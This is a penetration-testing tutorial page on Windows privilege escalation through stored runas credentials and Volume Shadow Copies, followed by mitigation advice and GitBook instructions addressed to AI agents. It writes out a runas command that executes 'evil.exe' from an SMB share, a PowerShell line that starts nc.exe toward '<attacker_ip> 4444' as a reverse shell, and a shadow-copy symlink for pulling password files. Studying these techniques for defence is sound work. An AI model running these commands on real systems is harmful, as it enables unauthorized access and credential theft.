> For the complete documentation index, see [llms.txt](https://karim-ashraf.gitbook.io/karim_ashraf_space/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://karim-ashraf.gitbook.io/karim_ashraf_space/writeups/windows-privilege-escalation/eop-runas.md).

# EoP - Runas

## Elevation of Privilege (EoP) Techniques: RunAs and Shadow Copies

**Overview**

Elevation of Privilege (EoP) techniques are commonly used by attackers to escalate permissions within a Windows environment. Two notable methods include exploiting the **RunAs** command for stored credentials and abusing **Shadow Copies** to access restricted files and elevate privileges.

***

## **1. EoP via RunAs Command**

The **RunAs** command allows users to execute programs with the permissions of another user. Attackers can leverage stored credentials to gain elevated access.

**Step 1: List Stored Credentials**

Stored credentials can be retrieved using the `cmdkey` utility. These credentials, if improperly managed, can be exploited to elevate privileges.

**Command to List Stored Credentials:**

```bash
cmdkey /list
```

**Example Output:**

```plaintext
Currently stored credentials:
    Target: Domain:interactive=WORKGROUP\Administrator
    Type: Domain Password
    User: WORKGROUP\Administrator
```

**Step 2: Execute Commands with Elevated Privileges**

Once stored credentials are identified, use the `runas` command with the `/savecred` option to execute binaries or scripts with elevated privileges.

**Examples:**

* **Run a Remote Binary via SMB Share:**

  ```bash
  runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
  ```
* **Open Command Prompt with Elevated Rights:**

  ```bash
  runas /savecred /user:Administrator "cmd.exe /k whoami"
  ```

**Step 3: Use Provided Credentials for Execution**

Commands can be executed using specific credentials provided programmatically in PowerShell.

**PowerShell Example:**

```powershell
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
Start-Process "C:\users\public\nc.exe" -ArgumentList "<attacker_ip> 4444" -Credential $mycreds
```

This method is particularly useful for automating EoP through scripts.

***

## **2. EoP via Shadow Copies**

**Shadow Copies** (Volume Shadow Copy Service) are backups of system files and volumes. They can be exploited to access files with elevated privileges, even if the files are locked or restricted.

**Step 1: List Shadow Copies**

To identify available Shadow Copies, use either `vssadmin` or `diskshadow`.

* **Using vssadmin:**

  ```bash
  vssadmin list shadows
  ```
* **Using diskshadow:**

  ```bash
  diskshadow
  DISKSHADOW> list shadows all
  ```

**Step 2: Access Shadow Copies**

Once Shadow Copies are identified, create a symbolic link (symlink) to access their contents.

**Example: Create a Symlink**

Assuming a Shadow Copy exists as **ShadowCopy1**, create a directory link:

```bash
mklink /d C:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
```

This command creates a folder `C:\shadowcopy` that points to the Shadow Copy, allowing unrestricted access to its contents. Sensitive files, such as password databases or configuration files, can then be retrieved.

***

## **Risks and Mitigation**

**RunAs Command Exploitation**

* **Risk:** Stored credentials can be exploited if they are not adequately protected.
* **Mitigation:**
  * Avoid using `/savecred` unless absolutely necessary.
  * Regularly clear stored credentials (`cmdkey /delete`).
  * Implement strong password policies and enforce multi-factor authentication (MFA).

**Shadow Copy Abuse**

* **Risk:** Allows unauthorized access to sensitive files.
* **Mitigation:**
  * Restrict local administrator access.
  * Regularly audit and disable unnecessary Shadow Copies.
  * Use encryption for sensitive files and system backups.

**General Mitigation Strategies:**

* Implement principle of **least privilege**.
* Enable logging and monitoring of credential access and Shadow Copy usage.
* Apply the latest patches and security updates to minimize vulnerabilities.

***

## **Conclusion**

The exploitation of stored credentials and Shadow Copies presents significant risks for privilege escalation. By understanding these techniques and applying the outlined mitigations, organizations can strengthen their defenses against EoP attacks.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://karim-ashraf.gitbook.io/karim_ashraf_space/writeups/windows-privilege-escalation/eop-runas.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.